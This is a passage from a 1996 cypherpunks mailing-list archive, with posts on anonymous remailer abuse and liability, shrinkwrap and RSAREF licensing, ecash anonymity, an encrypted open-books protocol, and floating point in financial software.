Adding automatic remailer registration is easy, but requires care to avoid
spammers
falsely registering victim@wherever.com as a remailer and then spamming.

SPAM POSSIBILITIES
------------------
That still allows 1-line spams like 
        Subject: <Expletive Deleted>!  You <perjorative deleted><ethnic slur
deleted>!
or      Subject: Our new Remail-Spam(tm) system lets you fit 1015 characters
in a Subject:                       line, just like this one, so your whole
message can fit through those
                anti-marketing filters!  You can MAKE M0NEY REAL FAST
building your downline -
                send e$1 of Bank Foo ecash to the top three addresses in the
Cc: line
but at least it cuts down on the annoyance level.  

It also supports messages like
        Subject: Secrets of the Scientologists for Sale!  Pick up message for 
                free sample and price list!  Operate your own Thetan today!
which permit direct-e-mail spams, or as some people prefer to call them,
marketing opportunities.  An interesting security/legality wrinkle is that
if somebody is trying to multicast-publish unencrypted contraband data,
it's sitting around in the mail-pickup spool, it can be seized by Bad Guys /
courts / sheriffs / etc.  As with most remailers, there's also a risk that
outgoing unicast mail could be seized while in the spool, which is higher
for a pickup system because the data may be in the spool longer.


#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 11:12:21 +0800
To: loki@infonex.com
Subject: Re: MixMaster fair use
Message-ID: <01I50JO1JL548Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@infonex.com" 22-MAY-1996 03:43:54.45

>It is patent on RSA, which expires in 2000 as I remember. It can be
>licensed, but it is not cheap. I don't know how they would handle a free
>program which people pay to use.

	Do they allow non-profit usage? If so, you could send out a new version
that supported ecash payments, with an agreement not to use it for profit. I'd
call building up a reserve against legal fees a justifiable action for a
non-profit organization (if the interest went back into the same account or
toward operating the remailer), but IANAL. Could someone who is comment,
preferably after looking over the RSA license?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Thu, 23 May 1996 15:29:40 +0800
To: cypherpunks@toad.com
Subject: Re: PROTOCOL: Encrypted Open Books
In-Reply-To: <adc6b62a1a02100403da@[205.199.118.202]>
Message-ID: <4o0cfk$1i7@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Apologies for replying to a reposted article; I wasn't subscribed when
the (very interesting!) open books protocol was originall proposed.

In article <adc6b62a1a02100403da@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> >Date: Mon, 16 Aug 93 13:57:51 -0700
> >From: Eric Hughes <hughes@soda.berkeley.edu>
> >Subject: PROTOCOL: Encrypted Open Books
> >
> >One criticism I do wish to address now.  I don't think it matters if
> >the bank manufactures fake transactions.  The customer can reveal the
> >sum of all the blinding factors for transactions on that account, in
> >public, and can thus prove what should have been there.  Since the
> >blinding factors were committed to in public, there is a strong
> >assurance that these blinding factors are what they are claimed to be.
> >This in itself can be made into an actual proof of liability.  Note
> >that even this revelantion does not compromise individual
> >transactions.  It only reveals the aggregate value change, which is
> >exactly what is at issue with the bank.

Yes, if the bank manufactures a fake transaction to a customer's
account, I see that the customer can discover the discrepancy & step
forward to identify the bank.

But what if the bank manufactures a fake account, without a real
customer, and fakes a transfer into that account, pocketing the
money that should have gone into that account?  There is no real
customer corresponding to that account to check up on the open
books, so it seems to me like a bank employee can embezzle money
undetectably this way.

Did I miss an important part of the protocol, or does some extra
mechanism need to be added to counter this threat?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 23 May 1996 11:31:16 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <Pine.A32.3.93.960521183731.12238A-100000@seminole.gate.net>
Message-ID: <Pine.SUN.3.93.960522171315.15860C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Ben Holiday wrote:

> 
> 
> On Tue, 21 May 1996, Daniel R. Oelke wrote:

> 
> > > The second is to simply include the
> > > consent-code along with the encrypted peice of mail and a legal notice
> > > stating that decryption of the mail constitutes your consent to receive
> > > the mail, as well as your agreement to hold the remailer-operator harmless
> > 
> > By reduction - you could just do a rot13 on the message and 
> > append the "legal notice".   If all the information for decoding
> > a message is present in that message, is a different encoding
> > mechanism really any different from straight ASCII text?  
> > (i.e. Netscape 9.13 might have auto decoding built it....)
> > Then, the user doesn't do anything "extra" - does this invalidate 
> > the notice?
> 
> Donno. IANAL. :)

A person has notice of a fact if he knows the fact, has reason to know it,
should know it, or has been given notification of it.  Restatement,
Second, Agency section 9.

The important issue here is what constitutes constructive or implied 
notice (the second example above).

Constructive notice exists where a party could have discovered a fact by
proper diligence and where the situation casts a duty on him to inquire
into the matter.

A person who has _actual_ notice of circumstances which would set of the
"alarm bells" of a prudent person has constructive notice of the issue
itself where a notice clause was available and easily referenced.

See F.P. Baugh, Inc. v. Little Lake Lumber Co., 297 F.2d 692, 696.

Also comes the question what notice is adequate?  Notice reasonably
calculated, in all circumstances, to apprise all interested parties of
actionm and opportunity to present their objections, says U.S. v San Juan
Lumber Co., 313 F.Supp. 703, 709.

I'm not going to discuss what constitutes a legal agreement here for the
purposes of waiving rights to hold the remailer operater harmless.  These
are traditionally unnegotiated agreements that courts are not likely to
want to enforce.  (Back of a ski lift ticket, notice that the garage is
not responsible for theft).

If a court feels that the remailer operator is being negligent or some
such, a notice like you are talking about is not likely to be very
effective.

I find that making the user decrypt the message as acceptance of the mail
is clever, but what exactly does it accomplish?  The user can still have
his copyrights violated in the text, what does it matter that he did or
did not accept the mailing?

> This would accomplish two things: We could source block an address without
> knowing the source; and if push came to shove an address could be
> backtracked to its original source, provided a complaint was made in time,
> and that the Bad Guy sent another mail from the same address. I think
> that legally there would be a good argument that the remailer ops had made
> a reasonable attempt and holding lawbreakers accountable, while still
> preserving the anonymity of non-abusers

Let's call this the "hash policy."

I'd be interested to see what the ration of volume between mailers with a
hash policy and mailers without a hash policy would be.

Simply the perception that records are being kept could have a chilling
effect.

The user is in no position to verify how secure those records are, or that
they are indeed hashed at all.

While the same is true with regards to logging at all (hash or no) I think
the feeling that the existance of records somehow makes it more likely the
the remailer operator will (with resistance) cooperate with the
authorities is amplified.

Either you do or do not believe that a remailer operator is keeping
full and unhashed records.

If you KNOW that records are being kept, well, to the user, what's the
difference between this and the mailer logging all traffic fully and
putting the information in a "Secure" directory?

How precisely does hashing protect the user?

> Just a thought.. 
> 
> Ben.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 23 May 1996 11:42:15 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <9605212257.AA00853@ch1d157nwk>
Message-ID: <Pine.SUN.3.93.960522174826.15860F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Andrew Loewenstern wrote:

> Ben Holiday <ncognito@gate.net> writes:
> >  As far as I can tell an agreement of this form would be at
> >  least as valid as the software licenses ("NOTICE: Opening this
> >  envelope constitutes your agreement to the terms.. blah blah
> >  blah") that are commonly used today.
> 
> IANAL, but I have one, and he said (a couple of years ago) that these  
> shrinkwrap contracts are practically worthless without a signature.  At least  
> this was how things were being handled in some districts.  Anyone care to  
> comment?

I concur.

> 
> crypto relevance:  Can RSADSI __really__ enforce the silly "thou shalt not  
> call certain functions" restrictions in their 'license'?  I doubt it, but I  
> would love for someone to prove me wrong.

This is closer.  You're asked to accept the terms of the license or return
the product.  It's a stronger issue and more likely to be upheld.

> 
> andrew
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Thu, 23 May 1996 16:01:02 +0800
To: cypherpunks@toad.com
Subject: Layman's explanation for limits on escrowed encryption ...
Message-ID: <199605230053.RAA28116@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone with some knowledge of NSA/DoS/FBI intentions please
explain why key length limitations are necessary for escrowed
encryption?

Please reply by E-Mail.

Thanks!

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 23 May 1996 11:18:13 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: An alternative to remailer shutdowns (fwd)
In-Reply-To: <Pine.LNX.3.93.960521163452.587D-100000@smoke.suba.com>
Message-ID: <Pine.SUN.3.93.960522175530.15860H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, snow wrote:

> On Mon, 20 May 1996, Jim Choate wrote:
> > Forwarded message:
> > > Date: Mon, 20 May 1996 15:02:08 -0700
> > > From: Hal <hfinney@shell.portal.com>
> > > Subject: An alternative to remailer shutdowns
> > > was apparently sent through my remailer.  According to 18 USC 875(c),
> > > "Whoever transmits in interstate commerce any communication containing


I don't have time to do it just now.   Look in the definitions section
under "transmit" and I bet you will find language that suggests it is the
original transmitter, not innocent intermediaries, which are liable under
the statute.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 13:38:57 +0800
To: iang@cs.berkeley.edu
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <01I50K5LNPQG8Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"iang@cs.berkeley.edu" 22-MAY-1996 14:51:29.42

>In the "normal" protocol, the payee has to go online.  In the "anon" protocol,
>the payer has to go online.  Since you don't want to go online when you
>walk into a shop, you can pay the shop with the "normal" protocol, and
>the shop gives you change with the "anon" protocol.

>That way, you never need to go online, and your identity is never compromised.

	However, the shop's still is, although the bank might not be able to
determine as much about how much income is coming in. OTOH, we're talking about
a physical shop situation; I'm not sure how critical it is to have shop
anonymnity with payor cooperation for this, since the payor can break it
anyway.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 23 May 1996 11:42:54 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Remailers, Copyright, and Scientology
In-Reply-To: <199605220346.UAA17821@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960522175944.15860I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, jim bell wrote:

> At 07:36 PM 5/21/96 -0500, Allen Ethridge wrote:
> >Yes, the cult does have a legitimate interest in protecting their
> >copyrights. 
> 
> I'm wondering whether they properly handled the copyright status of some of 
> those (silly) texts.  While it is somewhat nice of you (in regards to them) 
> to say what you did, it is  possible that they lost their copyrights decades 
> ago by printing them (even internally) without the (then) appropriate 
> "circle-C" copyright notice.  Chances are good that none of this material 
> could survive a genuine copyright test case today. 

Incorrect.

Please learn the "latter in time" rule and revisit the above question.

> 
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 11:53:15 +0800
To: bruce@aracnet.com
Subject: Re: The Crisis with Remailers
Message-ID: <01I50KKMD21Q8Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bruce@aracnet.com"  "Bruce Baugh" 22-MAY-1996 17:00:33.67

>Pointing people at legitimate uses of anonymity, as various folks have
>suggested, is undoubtedly a good idea. Would anyone care to suggest a few
>newsgroups where the vast majority of anonymous posts have really good
>reasons for being so?

	While it isn't usage of true cypherpunk remailers, the sexual abuse
survivors newsgroup(s) would appear to be a place to start. Some of the groups
discussing human rights cases are also a possibility, as is
alt.religion.scientology. 
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 23 May 1996 11:38:18 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: FTC online workshop on privacy
In-Reply-To: <01I4ZKWPMI7K8Y5IL9@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960522180726.15860L-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, E. ALLEN SMITH wrote:

> 	Pointing out encryption, anonymnity, etcetera as means couldn't
> hurt...
> 	BTW, at the end of the message is something from this Adam Starchild
> fellow, with a web address for "Asset Protection & Becoming Judgement Proof."
> I'd be interested in a review of it.

Unsophisticated, lacking in real substantative sources for material (scope
is again mentioned, and I find them often dangerously inaccurate, a resort
to the paladin press for reference information is equally suspect in my
view), and while containing some interesting ideas and general outlines,
mostly dangerous to those who do not understand that a little knowledge is
a dangerous thing.

> 
> Posted by Adam Starchild
>      Asset Protection & Becoming Judgement Proof at
>      http://www.catalog.com/corner/taxhaven

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 13:23:40 +0800
To: declan+@CMU.EDU
Subject: Re: FTC online workshop on privacy
Message-ID: <01I50KTHZCI88Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


        It's unsurprising that some of the same groups backing the CDA are
backing this, since they used danger to children as an excuse for it. (A
rather transparent one, given the actions vs Compuserve). I am disappointed in
EPIC for cooperating with them.

From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 22-MAY-1996 17:46:10.71

>Excerpts from internet.cypherpunks: 22-May-96 Re: FTC online workshop on
>.. by Declan McCullagh@CMU.EDU 
>> The legislation being introduced at 10:30 am will restrict selling
>> mailing lists with childrens' names and other identifying info on them,
>> including email lists. Another attempt to regulate the net, or a good
>> thing?

>Whoops. I should have said the press conference happened at 10:30 am.
>The bill will be introduced in both houses later this  week.

>Interesting press conference. Enough is Enough! took quite a bit of time
>to rant about the dangers of the Internet. Pedophiles, chat rooms,
>illegal pornography.

>You get the idea.

	Quite.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 12:05:44 +0800
To: cypherpunks@toad.com
Subject: Alleged abuse of anonymnity/pseudonymnity
Message-ID: <01I50LF7FUKG8Y4XBN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


        Someone's forgetting that it would be smart - and should be possible -
for the men in question also to be anonymous/pseudonymous. As it was, they
could have been, and were evidently too dumb. Edited for fair use.
        -Allen

>Kansas veterinarian extorts husbands on 'married but looking' chat line

>Copyright 1996 Nando.net
>Copyright 1996 The Associated Press

>(May 21, 1996 10:41 p.m. EDT) Men flirted shamelessly with "Rita" in 
>America Online's "Married But Looking" computer chat line. The typed chatter 
>often got steamy, and she even offered them provocative photos of herself.

>But some men found that "she" was a "he" -- with printed copies of their
>explicit exchanges and blackmail on his mind.

>Veterinarian Ron Hornbaker, 29, of Shawnee Mission, Kan., pleaded guilty to
>extortion Tuesday in a case that some say illustrates problems in the
>unpoliced Internet. He faces two years in prison and fines up to $250,000.

>"It's an old crime, just new tools," said assistant U.S. Attorney John
>McKenzie, who prosecuted the case in U.S. District Court in Rockford, Ill.

[...]

>In August 1995, Hornbaker created an America Online profile of himself as a
>married woman named Rita, authorities say. He would log into "Married But
>Looking" or similar chat areas and start engaging male victims in typed
>conversation. After a while, he would ask them to go to a more confidential
>area called a private chat room "to get to know each other better.

>"There Rita would engage each man in erotic conversation, asking the victim
>to get her "hot" and offering a sexy photograph.

>Hornbaker, meanwhile, stored the conversation and printed out transcripts.
>Victims awaiting the nude photograph instead got a threatening letter. In it,
>Hornbaker -- now posing as Rita's enraged husband -- said he'd found a
>transcript of the conversation between the victim and Rita.

>Hornbaker set up boxes at private mail services to handle the bribes,
>usually between $500 and $2,000. None of the recipients paid him.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 13:45:30 +0800
To: unicorn@schloss.li
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I50LTPJE848Y4XBT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 22-MAY-1996 18:40:57.71

>On Tue, 21 May 1996, Andrew Loewenstern wrote:
 
>> IANAL, but I have one, and he said (a couple of years ago) that these  
>> shrinkwrap contracts are practically worthless without a signature.  At
>> least this was how things were being handled in some districts.  Anyone
>> care to comment?

>I concur.

	Those (other) lawyers who I have read on the subject would also concur.

>> crypto relevance:  Can RSADSI __really__ enforce the silly "thou shalt not  
>> call certain functions" restrictions in their 'license'?  I doubt it, but I  
>> would love for someone to prove me wrong.

>This is closer.  You're asked to accept the terms of the license or return
>the product.  It's a stronger issue and more likely to be upheld.

	Would this be extensible to the remailer question by saying "agree to
hold us blameless for the contents of this mail or don't mail it back to us
for decoding"? Admittedly, this might not get around the problem of overly
long mail used for bombing, but with Mixmaster you'd get such a letter for
each section as I understand it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 23 May 1996 12:26:24 +0800
To: cypherpunks@toad.com
Subject: Re: the system CAN work
In-Reply-To: <199605222009.NAA01919@netcom11.netcom.com>
Message-ID: <XgqcoD39w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
>
> it takes two to tango. a corrupt government is the perfect match
> for a corrupt populace.

So why are you here? Go back to Sovok and improve the government there.
(I know, you like American welfare :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Vile <vile@burris.apdg.com>
Date: Thu, 23 May 1996 14:11:02 +0800
To: perry@piermont.com
Subject: Re: Floating Point and Financial Software
In-Reply-To: <199605221706.NAA23567@jekyll.piermont.com>
Message-ID: <9605222358.AA08828@burris.apdg.com>
MIME-Version: 1.0
Content-Type: text/plain


per@oiemont.com writes:
>Again, I have seen floating point used for things like rates and in
>simulations. I have never seen it used for accounting. If you can
>name a system in which accounts were kept in floats I'd like to hear
>about it -- personally I'd be surprised. I've never seen such a thing.

I don't think its all that uncommon....

The Options Clearing Corporation does all of their clearing in 64  
bit floats, for one.
Most market making firms (read not a huge bank, clearing risk of  
less than say 50 mil) tend to do their accounting (both in house,  
and inventory (derivative instrument inventory) )in packages written  
in dos which mostly do 32 bit floats -
Swiss Bank/O'connor, NationsBank/CRT, Fannie Mae, Merril Lynch use  
NeXT's as their trading platform so you can rest assured that they  
are using 64's

The Federal Reserve Bank, European Ecomonic Community, England,  
France, Germany, Japan, Canada, etc store their historical data in a  
time series database called FAME, which does 64 bit representation  
of floating point data....

Once you get down into the 10000th's of a us penny it really  
doesn't matter anymore...

--Kurt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 23 May 1996 06:57:45 +0800
To: perry@piermont.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605221614.MAA23436@jekyll.piermont.com>
Message-ID: <199605221708.TAA00752@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> It is true enough that *rates* can be stored as floats if you want,
> but never actual sums.
> 
> Perry


That's interesting.  Because rates never approach 2^23, and 
because you never need that much precision with rates?  It seems
like a bad idea to me anyway.  Why not just use an Int32 if you 
don't need that much precision?


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaNKIUjbHy8sKZitAQFohwL/TnGoBAD2qi+zCf43FqhhPijFf6vNq3Ca
ddhNsCKQTML3V7MtQ7TkeMNZqSGexITkXqppxaiFY/uPLqz3b5NDv0JV7xl0bFh9
AiqS4vz1uxeBON5jCJXZI4Cu7HhDf0j0
=pmvp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 24 May 1996 01:52:16 +0800
To: cypherpunks@toad.com
Subject: Re: MixMaster fair use
Message-ID: <199605231259.FAA13476@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 5/22/96 EDT, you wrote:
>From:	IN%"loki@infonex.com" 21-MAY-1996 17:19:02.59
>
>>The problem is RSAREF. I can't chose license terms for that.
>
>	Oof... I see the problem. No, it's not you, it's them. 

The Agreement, as written, covers all of Mixmaster; it would be easier
for people to adapt Mixmaster code if you either release a bones version
or a license that clarifies that you can't use the RSAREF portions
commercially but can do whatever you want with the rest of Mixmaster
(if that's what you want) or however much freedom you want to grant
(e.g. you may want to say some disclaimerish words about obeying ITAR etc.)

Consensus.com is doing commercial licensing for RSAREF now; there may
be some reasonably-priced approach to the problem.

RSAREF has at least three kinds of legal protection:
- contract (if you're using a licensed version)
- patent (on doing RSA-method encryption, not on the code itself)
- copyright (on the RSAREF code itself.)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 12:43:03 +0800
To: unicorn@schloss.li
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I50N2UZXFI8Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 22-MAY-1996 19:03:58.98

>On Tue, 21 May 1996, Ben Holiday wrote:

>> On Tue, 21 May 1996, Daniel R. Oelke wrote:

>>> The second is to simply include the
>>> consent-code along with the encrypted peice of mail and a legal notice
>>> stating that decryption of the mail constitutes your consent to receive
>>> the mail, as well as your agreement to hold the remailer-operator harmless
>> 
>> By reduction - you could just do a rot13 on the message and 
>> append the "legal notice".   If all the information for decoding
>> a message is present in that message, is a different encoding
>> mechanism really any different from straight ASCII text?  
>> (i.e. Netscape 9.13 might have auto decoding built it....)
>> Then, the user doesn't do anything "extra" - does this invalidate 
>> the notice?

>A person has notice of a fact if he knows the fact, has reason to know it,
>should know it, or has been given notification of it.  Restatement,
>Second, Agency section 9.

>The important issue here is what constitutes constructive or implied 
>notice (the second example above).

>Constructive notice exists where a party could have discovered a fact by
>proper diligence and where the situation casts a duty on him to inquire
>into the matter.

>A person who has _actual_ notice of circumstances which would set of the
>"alarm bells" of a prudent person has constructive notice of the issue
>itself where a notice clause was available and easily referenced.

>See F.P. Baugh, Inc. v. Little Lake Lumber Co., 297 F.2d 692, 696.

>Also comes the question what notice is adequate?  Notice reasonably
>calculated, in all circumstances, to apprise all interested parties of
>actionm and opportunity to present their objections, says U.S. v San Juan
>Lumber Co., 313 F.Supp. 703, 709.

>I'm not going to discuss what constitutes a legal agreement here for the
>purposes of waiving rights to hold the remailer operater harmless.  These
>are traditionally unnegotiated agreements that courts are not likely to
>want to enforce.  (Back of a ski lift ticket, notice that the garage is
>not responsible for theft).

	Umm... the RSA licensing agreement isn't exactly a negotiated contract.
What makes the difference between the contract in question and the RSA
licensing agreement (to use it as an example)?

>If a court feels that the remailer operator is being negligent or some
>such, a notice like you are talking about is not likely to be very
>effective.

	Part of this depends on negligent in what sense. If, due to the
message being encrypted, the remailer operator couldn't read it to see if it
was copyright-violating anyway, would he/she be negligent to send it on?  

>I find that making the user decrypt the message as acceptance of the mail
>is clever, but what exactly does it accomplish?  The user can still have
>his copyrights violated in the text, what does it matter that he did or
>did not accept the mailing?

	The primary use of the contract is to avoid complaints from the user
for "harrassing" email, not to avoid copyright problems. I'm not sure if there
is anything that could be done to avoid the copyright problems, aside from the
disposable output addresses with multiple remailers using them. (One
possible problem with these is that it could be argued that the remailer
operators sending to such addresses can read over the mail before encrypting it
to the front end and check to see if it's a copyright violation. However, they
would appear to be covered by the exemptions that should be in the copyright
law, namely for ISPs - if they aren't covered, then the Net is dead anyway.)
One method around this would be for the initial user to specify the output
address - or, preferably, input address that outputted to multiple different
output addresses - to use, and encrypt the message for that addresss. However,
this would require common knowledge of the input addresses, which could lead
to their being shut down quickly or the owner being held liable. One could have
a group of input/output providers with a common public/private key for the
initial user to use for the final encryption, although then you'd need to be
careful about who you let into this group.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 13:05:19 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <01I50NKMAX5W8Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I just realized that I haven't been making something clear. The
ephemeral endpoints (to use Lance Cottrell's phrase) will be identified when
they're used. The purpose of concealing from all but a trusted group (remailer
operators) their address (at first) is to slow that identification as much
as possible. If it takes someone (NSA or whatever) repeatedly sending messages
through to discover each new address, this will take longer (and make it harder
for traffic analysis, especially by other parties) than if the output end's
address were immediately made public knowledge. This can be helped by the
remailer(s) sending to the output address only accepting such mail from another
remailer.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: R.Hirschfeld@cwi.nl
Date: Thu, 23 May 1996 07:41:00 +0800
To: matts@pi.se
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960522141400.00340478@mail.pi.se>
Message-ID: <9605221739.AA03647=ray@groen.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain


Despite the ugliness of floating point arithmetic (lack of
associativity, for example) and my general distaste for it, I would
have to agree that 64-bit floats are higher precision than 32-bit
fixed-points, since more than half the bits are mantissa.

Do major currency traders really store money as 64-bit floats?  It
surprises me.

By the way, I thought the "get real" pun was funny and not at all
disparaging.  But I hope that "get rational" is good enough for
currency exchange.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 23 May 1996 15:30:38 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: FTC online workshop on privacy
In-Reply-To: <01I50KTHZCI88Y4X9G@mbcl.rutgers.edu>
Message-ID: <0lcucI200YUzQcMfpR@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from cypherpunks: 22-May-96 Re: FTC online workshop on .. by
"E. ALLEN SMITH"@ocelot. 
>         It's unsurprising that some of the same groups backing the CDA are
> backing this, since they used danger to children as an excuse for it. (A
> rather transparent one, given the actions vs Compuserve). I am
disappointed in
>  
> EPIC for cooperating with them.

You shouldn't be, and I should have been more clear. There is a broad
coalition of groups supporting this legislation, including (from memory)
the Kids off Lists! project, Center for Media Education, and Consumer
Federation of America.

I'm putting together a writeup of the press conference today and the
language of the bill. More on this later tonight.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 23 May 1996 16:02:08 +0800
To: cypherpunks@toad.com
Subject: Re: PROTOCOL: Encrypted Open Books
Message-ID: <adc9278f000210043a78@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM 5/23/96, David Wagner wrote:
>Apologies for replying to a reposted article; I wasn't subscribed when
>the (very interesting!) open books protocol was originall proposed.
...
>Did I miss an important part of the protocol, or does some extra
>mechanism need to be added to counter this threat?

I only forwarded the original article, not any of the discussion which followed.

Inasmuch as the archives at hks don't appear to be coming back anytime soon
(the March 18th message said "a few days"), I'll forward to the list the
